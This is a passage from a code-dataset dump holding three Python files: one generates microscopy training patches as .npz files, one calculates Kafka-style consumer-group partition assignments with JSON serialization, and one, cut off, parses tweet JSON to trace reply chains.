array\")\ndef generate_2D_patch_training_data(BaseDirectory, SaveNpzDirectory, SaveName, patch_size = (512,512), n_patches_per_image = 64, transforms = None):\n\n \n raw_data = RawData.from_folder (\n basepath = BaseDirectory,\n source_dirs = ['Original'],\n target_dir = 'BinaryMask',\n axes = 'YX',\n )\n \n X, Y, XY_axes = create_patches (\n raw_data = raw_data,\n patch_size = patch_size,\n n_patches_per_image = n_patches_per_image,\n transforms = transforms,\n save_file = SaveNpzDirectory + SaveName,\n )\ndef _memory_check(n_required_memory_bytes, thresh_free_frac=0.5, thresh_abs_bytes=1024*1024**2):\n try:\n # raise ImportError\n import psutil\n mem = psutil.virtual_memory()\n mem_frac = n_required_memory_bytes / mem.available\n if mem_frac > 1:\n raise MemoryError('Not enough available memory.')\n elif mem_frac > thresh_free_frac:\n print('Warning: will use at least %.0f MB (%.1f%%) of available memory.\\n' % (n_required_memory_bytes/1024**2,100*mem_frac), file=sys.stderr)\n sys.stderr.flush()\n except ImportError:\n if n_required_memory_bytes > thresh_abs_bytes:\n print('Warning: 
will use at least %.0f MB of memory.\\n' % (n_required_memory_bytes/1024**2), file=sys.stderr)\n sys.stderr.flush() \ndef generate_downsample_2D_patch_training_data(BaseDirectory, SaveNpzDirectory, SaveName, patch_size = (512,512), n_patches_per_image = 64, downsample_factor = 2, transforms = None):\n\n \n raw_data = LocalRawData.from_folder (\n basepath = BaseDirectory,\n source_dirs = ['MoreOriginal'],\n target_dir = 'MoreBinary',\n axes = 'YX',\n downsample_factor = downsample_factor\n )\n \n X, Y, XY_axes = create_patches (\n raw_data = raw_data,\n patch_size = patch_size,\n n_patches_per_image = n_patches_per_image,\n transforms = transforms,\n save_file = SaveNpzDirectory + SaveName\n )\n\ndef generate_2D_training_data(Imagedir, Labeldir, SaveNpzDirectory, SaveName, SaveNameVal,shapeX, shapeY, display = 0):\n \n \n \n \n axes = 'SXYC'\n save_data(axes, Imagedir, Labeldir, SaveNpzDirectory, SaveName, SaveNameVal,shapeX, shapeY, display, None)\n \n \ndef generate_3D_training_data(Imagedir, Labeldir, SaveNpzDirectory, SaveName, SaveNameVal,shapeX, shapeY, display = 0, displayZ = 0):\n \n \n assert len(Imagedir) == len(Labeldir)\n \n axes = 'SZXYC'\n save_data(axes, Imagedir, Labeldir, SaveNpzDirectory, SaveName, SaveNameVal,shapeX, shapeY, display, displayZ)\n\n \ndef save_data(axes, Imagedir, Labeldir, SaveNpzDirectory, SaveName, SaveNameVal,shapeX, shapeY, display, displayZ):\n \n\n data = []\n masks = []\n \n\n \n Y = sorted(glob(Labeldir + '/' + '*.tif'))\n print(Y)\n LabelImages = list(map(imread, Y))\n FilledLabelImages = [y for y in tqdm(LabelImages)]\n \n X = sorted(glob(Imagedir + '/' + '*.tif'))\n Images = list(map(imread, X))\n NormalizeImages = [normalizeFloat(image,1,99.8) for image in tqdm(Images)]\n \n\n\n assert all(Path(x).name==Path(y).name for x,y in zip(X,Y))\n \n for i in range(0, len(NormalizeImages)):\n \n X = NormalizeImages[i]\n Y = FilledLabelImages[i]\n Xbig = np.zeros([shapeX, shapeY]) \n Xbig[0:shapeX, 0:shapeY] = X\n \n Ybig = np.zeros([shapeX, shapeY]) \n Ybig[0:shapeX, 0:shapeY] = Y\n \n Xbig = np.expand_dims(Xbig, -1)\n Ybig = np.expand_dims(Ybig, -1)\n data.append(Xbig)\n masks.append(Ybig)\n \n \n data = np.array(data)\n masks = np.array(masks)\n \n if display is not None and display < len(NormalizeImages):\n if displayZ == None:\n plt.figure(figsize=(16,10))\n plt.subplot(121); plt.imshow(NormalizeImages[display],cmap='gray'); plt.axis('off'); plt.title('Raw image')\n plt.subplot(122); plt.imshow(FilledLabelImages[display],cmap=lbl_cmap); plt.axis('off'); plt.title('GT labels')\n None;\n else:\n plt.figure(figsize=(16,10))\n plt.subplot(121); plt.imshow(NormalizeImages[display][displayZ,:,:],cmap='gray'); plt.axis('off'); plt.title('Raw image')\n plt.subplot(122); plt.imshow(FilledLabelImages[display][displayZ,:,:],cmap=lbl_cmap); plt.axis('off'); plt.title('GT labels')\n None;\n \n \n print(data.shape, masks.shape)\n \n traindata, validdata, trainlabel, validlabel = train_test_split(data, masks, train_size = 0.95, test_size = 0.05, shuffle = True)\n \n save_full_training_data(SaveNpzDirectory, SaveName, traindata, trainlabel, axes)\n save_full_training_data(SaveNpzDirectory, SaveNameVal, validdata, validlabel, axes)\n\n \n \ndef _raise(e):\n raise e\n\n \ndef save_training_data(directory, filename, data, label, sublabel, axes):\n \"\"\"Save training data in ``.npz`` format.\"\"\"\n \n \n \n len(axes) == data.ndim or _raise(ValueError())\n np.savez(directory + filename, data = data, label = label, label2 = sublabel, axes = axes)\n \n \ndef 
save_full_training_data(directory, filename, data, label, axes):\n \"\"\"Save training data in ``.npz`` format.\"\"\"\n \n\n len(axes) == data.ndim or _raise(ValueError())\n np.savez(directory + filename, data = data, label = label, axes = axes) \n \n \n# https://docs.python.org/3/library/itertools.html#itertools-recipes\ndef consume(iterator):\n collections.deque(iterator, maxlen=0)\n\n\n\n \n ", "sub_path": "Terminator/TerminatorUtils/npzfileGenerator.py", "file_name": "npzfileGenerator.py", "file_ext": "py", "file_size_in_byte": 17813, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "numpy.random.seed", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 16, "usage_type": "attribute"}, {"api_name": "stardist.random_label_cmap", "line_number": 17, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 26, "usage_type": "call"}, {"api_name": "tempfile.TemporaryDirectory", "line_number": 32, "usage_type": "attribute"}, {"api_name": "csbdeepLocal.data.no_background_patches", "line_number": 47, "usage_type": "call"}, {"api_name": "csbdeepLocal.data.norm_percentiles", "line_number": 48, "usage_type": "call"}, {"api_name": "csbdeep.data.transform.permute_axes", "line_number": 110, "usage_type": "call"}, {"api_name": "csbdeep.data.transform.Transform.identity", "line_number": 112, "usage_type": "call"}, {"api_name": "csbdeep.data.transform.Transform", "line_number": 112, "usage_type": "name"}, {"api_name": "csbdeep.data.transform.Transform", "line_number": 116, "usage_type": "call"}, {"api_name": "csbdeep.utils.compose", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.prod", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.prod", "line_number": 121, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 143, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 143, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 146, "usage_type": "attribute"}, {"api_name": "numpy.empty_like", "line_number": 147, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 149, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 151, "usage_type": "call"}, {"api_name": "csbdeep.utils.axes_check_and_normalize", "line_number": 154, "usage_type": "call"}, {"api_name": "csbdeep.utils.axes_dict", "line_number": 155, "usage_type": "call"}, {"api_name": "csbdeep.utils.axes_check_and_normalize", "line_number": 158, "usage_type": "call"}, {"api_name": "csbdeep.utils._raise", "line_number": 158, "usage_type": "call"}, {"api_name": "csbdeep.utils._raise", "line_number": 159, "usage_type": "call"}, {"api_name": "csbdeep.utils._raise", "line_number": 160, "usage_type": "call"}, {"api_name": "csbdeep.utils._raise", "line_number": 161, "usage_type": "call"}, {"api_name": "csbdeep.utils._raise", "line_number": 162, "usage_type": "call"}, {"api_name": "csbdeepLocal.data.sample_patches_from_multiple_stacks", "line_number": 164, "usage_type": "call"}, {"api_name": "csbdeepLocal.data.shuffle_inplace", "line_number": 170, "usage_type": "call"}, {"api_name": "skimage.transform.downscale_local_mean", "line_number": 173, "usage_type": "call"}, {"api_name": "skimage.transform.downscale_local_mean", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 178, "usage_type": "call"}, {"api_name": 
"numpy.expand_dims", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.moveaxis", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.moveaxis", "line_number": 182, "usage_type": "call"}, {"api_name": "pathlib2.Path", "line_number": 185, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 189, "usage_type": "call"}, {"api_name": "pathlib2.Path", "line_number": 252, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 253, "usage_type": "call"}, {"api_name": "csbdeep.utils._raise", "line_number": 254, "usage_type": "call"}, {"api_name": "csbdeep.utils.consume", "line_number": 255, "usage_type": "call"}, {"api_name": "csbdeep.utils._raise", "line_number": 255, "usage_type": "call"}, {"api_name": "csbdeep.utils.axes_check_and_normalize", "line_number": 256, "usage_type": "call"}, {"api_name": "tifffile.imread", "line_number": 263, "usage_type": "call"}, {"api_name": "skimage.transform.downscale_local_mean", "line_number": 264, "usage_type": "call"}, {"api_name": "skimage.transform.downscale_local_mean", "line_number": 265, "usage_type": "call"}, {"api_name": "csbdeep.utils._raise", "line_number": 266, "usage_type": "call"}, {"api_name": "csbdeepLocal.data.RawData", "line_number": 269, "usage_type": "call"}, {"api_name": "csbdeep.utils._raise", "line_number": 279, "usage_type": "call"}, {"api_name": "csbdeepLocal.data.RawData", "line_number": 282, "usage_type": "call"}, {"api_name": "csbdeepLocal.data.RawData.from_folder", "line_number": 286, "usage_type": "call"}, {"api_name": "csbdeepLocal.data.RawData", "line_number": 286, "usage_type": "name"}, {"api_name": "csbdeepLocal.data.create_patches", "line_number": 293, "usage_type": "call"}, {"api_name": "psutil.virtual_memory", "line_number": 304, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 309, "usage_type": "attribute"}, {"api_name": "sys.stderr.flush", "line_number": 310, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 310, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 313, "usage_type": "attribute"}, {"api_name": "sys.stderr.flush", "line_number": 314, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 314, "usage_type": "attribute"}, {"api_name": "csbdeepLocal.data.create_patches", "line_number": 326, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 360, "usage_type": "call"}, {"api_name": "tifffile.imread", "line_number": 362, "usage_type": "argument"}, {"api_name": "tqdm.tqdm", "line_number": 363, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 365, "usage_type": "call"}, {"api_name": "tifffile.imread", "line_number": 366, "usage_type": "argument"}, {"api_name": "helpers.normalizeFloat", "line_number": 367, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 367, "usage_type": "call"}, {"api_name": "pathlib2.Path", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 377, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 380, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 383, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 384, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 389, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 390, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 394, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 394, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.subplot", "line_number": 395, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 395, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 395, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 395, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 395, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 396, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 396, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 396, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 396, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 396, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 399, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 399, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 400, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 400, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 400, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 400, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 400, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 401, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 401, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 401, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 401, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 401, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 407, "usage_type": "call"}, {"api_name": "csbdeep.utils._raise", "line_number": 423, "usage_type": "call"}, {"api_name": "numpy.savez", "line_number": 424, "usage_type": "call"}, {"api_name": "csbdeep.utils._raise", "line_number": 431, "usage_type": "call"}, {"api_name": "numpy.savez", "line_number": 432, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 437, "usage_type": "call"}]} +{"seq_id": "629578337", "text": "import logging\nfrom typing import Any\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\n\nimport ujson\n\nlogger = logging.getLogger(__name__)\n\n#: A mapping of topics to assigned partitions.\n#: This type is used to maintain a map of assignments for a particular member. 
It is\n#: constructed soley of built-in types to ease serialization/deserialization.\nTopicAssignment = Dict[str, List[int]]\n\n#: A mapping of topics to their partition count.\nTopics = Dict[str, int]\n\n#: The identifier used to assign `TopicAssignments` to a member of the consumer group.\nMemberId = int\n\n\nclass MemberAssignment:\n @staticmethod\n def fromPrimitive(pRep) -> Optional['MemberAssignment']:\n \"\"\"\n Converts the primitive representation as produced by `toPrimitive()`\n back into a MemberAssignment.\n\n returns (MemberAssignment): None returned if the input does not conform\n \"\"\"\n\n valid = True\n valid = (\n pRep is not None\n and 'memberId' in pRep\n and 'topics' in pRep\n and isinstance(pRep['topics'], dict)\n and isinstance(pRep['memberId'], int)\n )\n\n if valid:\n for t, pList in pRep['topics'].items():\n if not valid:\n break\n\n if not isinstance(pList, list):\n valid = False\n else:\n for p in pList:\n if not isinstance(p, int):\n valid = False\n break\n\n if valid:\n return MemberAssignment(int(pRep['memberId']), pRep['topics'])\n else:\n logger.warning('Failed to convert primitive member assignment to MemberAssignment. prim: %s', pRep)\n return None\n\n def __init__(self, memberId: MemberId, topics: Optional[TopicAssignment] = None):\n \"\"\"Manages the assignments for a specific member of the assignment group.\n\n Instances of this class are used to manage the topic-partition assignments for a\n specific member identified by a `MemberId`.\n\n When using this class one can iterate over the assignments in a predetermined order\n that should stay consistent regardless of what order the assignments were assigned.\n\n Support for serialization and deserialization is provided by the class method `MemberAssignment.fromPrimitive()`\n and the instance method `toPrimitive()` which can be used with tools for working with different serialization formats\n (json and yaml for instance).\n\n Attributes:\n memberId (MemberId): The member these assignments are for.\n topics (TopicAssignment): The actual topic-partition assignments.\n \"\"\"\n\n self.memberId = memberId\n self.topics: TopicAssignment = topics if topics is not None else dict()\n\n def __str__(self):\n return f'memberId: {self.memberId}, topics: {self.topics}'\n\n def __repr__(self):\n return self.__str__()\n\n def __iter__(self):\n index = sorted(self.topics.keys())\n for t in index:\n pIndex = sorted(self.topics[t])\n for p in pIndex:\n yield (t, p)\n\n def toPrimitive(self) -> Dict[str, Any]:\n \"\"\"A representation consisting only of built-in types.\n\n Return a representation consisting of only built in types.\n This is useful for JSON serdes.\n \"\"\"\n return {'memberId': self.memberId, 'topics': self.topics}\n\n def totalAssignments(self):\n \"\"\"The total number of partition assignments currently assigned to this member.\"\"\"\n return sum([len(p) for t, p in self.topics.items()])\n\n def assign(self, topic: str, partition: int):\n \"\"\"Assigns the topic and partition number to this member.\n\n Assigns the topic-partition combination to this member. 
It does not validate\n the correctness of the assignment such as verifying the topic or partition number exists.\n\n Args:\n topic (str): Name of the topic to be assigned\n partition (int): The topic partition number to be assigned\n \"\"\"\n if topic not in self.topics:\n self.topics[topic] = []\n\n if partition not in self.topics[topic]:\n self.topics[topic].append(partition)\n\n\nclass AssignmentVersion:\n def __init__(self, version: int, configVersion: int, group: str):\n \"\"\"A small token that represents the version of a group's `Assignments`.\n\n Indicates the version of the assignments associated with a static membership\n group.\n\n Attributes:\n version (int): The version of the assignment, this is a monotonically incrementing integer that changes whenever the Assignments change.\n configVersion (int): This version prevents older process configurations from reverting newer ones. It should always increase over time.\n group (str): The name of the consumer group, allows assignments to be isolated based on group.\n \"\"\"\n\n self.version = version\n self.configVersion = configVersion\n self.group = group\n\n\nclass Assignments:\n @staticmethod\n def fromJson(jsonData: str) -> Optional['Assignments']:\n \"\"\"Deserializes the given JSON assuming it was generated by `asJson()`.\n\n Deserializes JSON as produced by the asJson() method into an Assignments object.\n\n Args:\n jsonData (str): The serialized Assignments JSON\n\n Returns:\n Assignments: The deserialized Assignments or None if the jsonData is invalid\n \"\"\"\n assignments = None\n try:\n parsed = ujson.loads(jsonData)\n topics = parsed['topics']\n maxMembers = int(parsed['maxMembers'])\n group = parsed['group']\n configVersion = int(parsed.get('configVersion', -1))\n version = int(parsed.get('version', -1))\n primitiveMemberAssignments = parsed['memberAssignments']\n\n memberAssignments = [\n ma\n for ma in [MemberAssignment.fromPrimitive(pma) for pma in primitiveMemberAssignments]\n if ma is not None\n ]\n\n if isinstance(topics, Dict):\n assignments = Assignments(\n group, maxMembers, topics, configVersion, version, memberAssignments, len(memberAssignments) < 1\n )\n except Exception:\n logger.exception(\"Failed to parse Assignments from JSON. json: '%s'\", jsonData)\n\n return assignments\n\n def __init__(\n self,\n group: str = 'NO_GROUP',\n maxMembers: int = 0,\n topics: Topics = {},\n configVersion: int = -1,\n version: int = -1,\n memberAssignments: List[MemberAssignment] = [],\n doReassign: bool = True,\n ):\n \"\"\"Represents and manages all assignments for a group.\n\n This represents all calculated assignments for a group. It is statically generated and\n creates assignments for members from `MemberId` 0 to `maxMembers`. It does not assign\n any particular consumer instance to the assignments, that is left to another part of the\n program.\n\n Supports identifying upon criteria changes (maxMembers, topics) whether the assignment table\n will change and optionally recalculates all assignments according to the new values.\n\n Attributes:\n group (str): The group name these assignments belong to.\n maxMembers (int): The maximum number of members expected for this group.\n topics (Topics): A list of topics to assign across the members.\n configVersion (int): A version number that should always increase in value\n when changes occur due to release time changes. The unix epoch at the\n time of release will do. 
\n\nclass Assignments:\n @staticmethod\n def fromJson(jsonData: str) -> Optional['Assignments']:\n \"\"\"Deserializes the given JSON assuming it was generated by `asJson()`.\n\n Deserializes JSON as produced by the asJson() method into an Assignments object.\n\n Args:\n jsonData (str): The serialized Assignments JSON\n\n Returns:\n Assignments: The deserialized Assignments or None if the jsonData is invalid\n \"\"\"\n assignments = None\n try:\n parsed = ujson.loads(jsonData)\n topics = parsed['topics']\n maxMembers = int(parsed['maxMembers'])\n group = parsed['group']\n configVersion = int(parsed.get('configVersion', -1))\n version = int(parsed.get('version', -1))\n primitiveMemberAssignments = parsed['memberAssignments']\n\n memberAssignments = [\n ma\n for ma in [MemberAssignment.fromPrimitive(pma) for pma in primitiveMemberAssignments]\n if ma is not None\n ]\n\n if isinstance(topics, dict):\n assignments = Assignments(\n group, maxMembers, topics, configVersion, version, memberAssignments, len(memberAssignments) < 1\n )\n except Exception:\n logger.exception(\"Failed to parse Assignments from JSON. json: '%s'\", jsonData)\n\n return assignments\n\n def __init__(\n self,\n group: str = 'NO_GROUP',\n maxMembers: int = 0,\n topics: Optional[Topics] = None,\n configVersion: int = -1,\n version: int = -1,\n memberAssignments: Optional[List[MemberAssignment]] = None,\n doReassign: bool = True,\n ):\n \"\"\"Represents and manages all assignments for a group.\n\n This represents all calculated assignments for a group. It is statically generated and\n creates assignments for members from `MemberId` 0 to `maxMembers`. It does not assign\n any particular consumer instance to the assignments; that is left to another part of the\n program.\n\n Supports identifying upon criteria changes (maxMembers, topics) whether the assignment table\n will change and optionally recalculates all assignments according to the new values.\n\n Attributes:\n group (str): The group name these assignments belong to.\n maxMembers (int): The maximum number of members expected for this group.\n topics (Topics): A mapping of topic names to partition counts to assign across the members.\n configVersion (int): A version number that should always increase in value\n when changes occur due to release time changes. The unix epoch at the\n time of release will do. This allows us to identify older assignments from\n newer ones during deployment time.\n version (int): A monotonically increasing version number that changes with every update,\n including those triggered by release changes and those at runtime, such as partition\n count updates.\n memberAssignments (List[MemberAssignment]): All calculated member assignments with the\n list index also representing the `MemberId`.\n doReassign (bool): Whether to perform reassignment calculations at init. Defaults to True.\n \"\"\"\n # all distributed topics and partition counts\n self.group = group\n self.topics = topics if topics is not None else {}\n self.maxMembers = maxMembers\n self.version = version\n self.configVersion = configVersion\n\n if self.configVersion == -1:\n self._warning('configVersion', '-1')\n if self.version == -1:\n self._warning('version', '-1')\n if self.maxMembers == 0:\n self._warning('maxMembers', '0')\n\n # member id to assignments\n self.memberAssignments = memberAssignments if memberAssignments is not None else []\n if doReassign:\n self._reassign()\n\n def _warning(self, attr: str, val: str):\n logger.warning('''\n WARNING WARNING WARNING\n\n Assignments %s found to be `%s`; this is an invalid, default value.\n Check your configuration!\n ''', attr, val)\n\n\n def __str__(self):\n return f'{{assignments: {self.memberAssignments}}}'\n\n def __repr__(self):\n return self.__str__()\n\n def _reassign(self):\n calculator = AssignmentCalculator(self.maxMembers, self.topics)\n self.memberAssignments = calculator.generateAssignments(self)\n\n def asJson(self) -> str:\n \"\"\"\n Serializes this object into JSON suitable for deserialization using\n the static method `fromJson()`.\n\n Returns:\n str: The JSON\n \"\"\"\n j: Dict[str, Any] = {}\n j['group'] = self.group\n j['topics'] = self.topics\n j['maxMembers'] = self.maxMembers\n j['version'] = self.version\n j['configVersion'] = self.configVersion\n j['memberAssignments'] = [ma.toPrimitive() for ma in self.memberAssignments]\n\n return ujson.dumps(j)\n\n def assignmentVersion(self) -> AssignmentVersion:\n \"\"\"Generate an `AssignmentVersion` token from this.\n\n The generated `AssignmentVersion` may contain default (invalid) values based on the current\n state of the assignment.\n\n Returns:\n AssignmentVersion: Generated version token for this.\n \"\"\"\n return AssignmentVersion(self.version, self.configVersion, self.group)\n\n def changeMaxMembers(self, maxMembers: int) -> bool:\n \"\"\"Update the maximum members belonging to this group's assignments.\n\n Updates the maximum number of members that may belong to this group. If this\n update causes a change to the assignments then True will be returned.\n\n Args:\n maxMembers (int): The new maximum group size, must be greater than 0\n\n Returns:\n bool: True if the change triggered a recalculation of assignments\n \"\"\"\n return self._changeMaxMembers(maxMembers)\n\n def _changeMaxMembers(self, maxMembers: int, doReassign: bool = True) -> bool:\n if maxMembers <= 0:\n raise ValueError(\n f\"Invalid maxMembers argument, expected to be greater than 0, but received: '{maxMembers}'\"\n )\n\n changed = self.maxMembers != maxMembers\n if changed:\n self.maxMembers = maxMembers\n\n if doReassign:\n self._reassign()\n return changed\n\n def changeTopicPartitions(self, topics: Topics) -> bool:\n \"\"\"Replace the topic-partitions that should be assigned.\n\n Updates the topic partitions that should be assigned across the members. If\n this change causes an assignment redistribution then True is returned.\n\n This is a complete replacement; all previous topic-partitions will be removed.\n\n Args:\n topics (Topics): Updated dictionary of topics with partition counts\n\n Returns:\n bool: True if a change in assignments occurred\n \"\"\"\n return self._changeTopicPartitions(topics)\n\n def _changeTopicPartitions(self, topics: Topics, doReassign: bool = True) -> bool:\n # dict equality also detects topics that were removed, not just topics\n # that were added or whose partition counts changed\n changed = topics != self.topics\n\n if changed:\n self.topics = topics\n\n if doReassign:\n self._reassign()\n\n return changed\n
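\n # Illustrative example (not part of the original module): the JSON round\n # trip and change detection compose like so:\n #\n # a = Assignments('jobs', maxMembers=2, topics={'work': 4})\n # b = Assignments.fromJson(a.asJson())\n # b.topics == {'work': 4}\n # a.changeTopicPartitions({'work': 8}) is True # differs, so it reassigns\n # a.changeTopicPartitions({'work': 8}) is False # no-op the second time\n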
\n def getMemberAssignment(self, memberId: MemberId) -> Optional[MemberAssignment]:\n \"\"\"Get assignments for a particular member.\n\n Fetches the assignments for the given member ID.\n\n Args:\n memberId (int): The member ID to find the assignments for\n\n Returns:\n MemberAssignment: The assignments for the member ID or None if the member ID is unknown or unassigned\n \"\"\"\n if len(self.memberAssignments) > memberId:\n return self.memberAssignments[memberId]\n else:\n return None\n\n\nclass AssignmentCalculator:\n def __init__(self, maxSize: int, topics: Topics):\n \"\"\"Calculates group assignments.\n\n Calculates group assignments based on the given criteria.\n\n Args:\n maxSize (int): The maximum number of assignments to calculate\n topics (Topics): A dictionary of topic names to partition counts that need assigning\n \"\"\"\n\n self.maxSize = maxSize\n self.topics = topics\n\n def _partitionsByIndex(self):\n \"\"\"\n This generator will return (topic, partition number) tuples in a well-defined order that\n is breadth first. For example it will return all 0 partitions of each topic first, then all 1 partitions,\n etc. until all topic partitions are doled out.\n \"\"\"\n\n topics = {}\n for t, p in self.topics.items():\n topics[t] = {'count': p, 'pos': 0}\n\n sortedTopics = sorted(topics.keys())\n\n while len(topics) != 0:\n for t in sortedTopics:\n if t in topics:\n if topics[t]['pos'] < topics[t]['count']:\n yield (t, topics[t]['pos'])\n topics[t]['pos'] += 1\n else:\n del topics[t]\n\n def _totalPartitions(self):\n return sum(self.topics.values())\n
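\n # Illustrative example (not part of the original module): for\n # topics = {'a': 2, 'b': 3}, _partitionsByIndex() yields\n # ('a', 0), ('b', 0), ('a', 1), ('b', 1), ('b', 2).\n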
\n def generateAssignments(self, prevAssignments: Optional[Assignments] = None) -> List[MemberAssignment]:\n \"\"\"Generates all assignments.\n\n Generates a new list of assignments for all members based on the state of the calculator. Can take into\n consideration the max group size, topics to distribute and previous assignments.\n\n Args:\n prevAssignments (Assignments): Can be used to help determine efficient redistribution of assignments\n\n Returns:\n List[MemberAssignment]: The calculated list of all member assignments with the list index also being the `MemberId`.\n \"\"\"\n\n if self.maxSize is None or self.maxSize == 0 or self.topics is None or len(self.topics) == 0:\n return []\n\n tpSize = self._totalPartitions()\n tpIter = self._partitionsByIndex()\n members = [MemberAssignment(i) for i in range(self.maxSize)]\n\n if self.maxSize >= tpSize:\n perMbrPartitions = 1\n remainders = 0\n else:\n perMbrPartitions = tpSize // self.maxSize\n remainders = tpSize % self.maxSize\n\n logger.info('perMbrCount: %s, remainders: %s', perMbrPartitions, remainders)\n for mbr in members:\n pCount = perMbrPartitions\n if remainders > 0:\n pCount += 1\n remainders -= 1\n\n assignCount = 0\n for t, p in tpIter:\n mbr.assign(t, p)\n assignCount += 1\n if assignCount >= pCount:\n break\n\n return members\n", "sub_path": "app/static_assignment/assignments.py", "file_name": "assignments.py", "file_ext": "py", "file_size_in_byte": 16135, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 14, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 14, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 17, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 61, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 95, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 95, "usage_type": "name"}, {"api_name": "ujson.loads", "line_number": 157, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 171, "usage_type": "argument"}, {"api_name": "typing.Optional", "line_number": 144, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 187, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 261, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 261, "usage_type": "name"}, {"api_name": "ujson.dumps", "line_number": 269, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 341, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 397, "usage_type": "name"}]} +{"seq_id": "424189605", "text": "import os.path\nimport re\nimport time\nfrom datetime import datetime\n\n# match the tweet text inside \"text\":\"\", which can contain escaped quotes\ntweet_re = re.compile('\"text\":\"((?:[^\"\\\\\\\\]*(?:\\\\\\\\.)?)*)\"')\ntweet_id_re = re.compile('\"id\":(\\d*)')\n# timestamp was not added until 2014; fall back to using 'created_at' if not available\ntimestamp_re = re.compile('\"timestamp_ms\":\"(\\d*)\"')\ncreated_at_re = re.compile('\"created_at\":\"([^\"]*)\"')\n\nparent_id_re = re.compile('\"in_reply_to_status_id\":(\\d*),')\n\n# maps tweet id -> id of its highest-level parent (0 marks a chain root)\ntweet_parent = {}\n\nwith open(\"tweet_replies.txt\", 'w') as f_out:\n for m in range(1, 13):\n for d in range(1, 32):\n\n path = \"%02d/%02d.ru.json\" % (m, d)\n\n if os.path.isfile(path):\n print(\"File: %s\" % path)\n with open(path) as f:\n for line in f:\n text_match = tweet_re.search(line)\n if not text_match:\n print(\"No tweet text found in file %s's line %s!\" % (path, line))\n continue\n\n 
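# pull out the numeric tweet id; skip lines that do not contain one\n 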
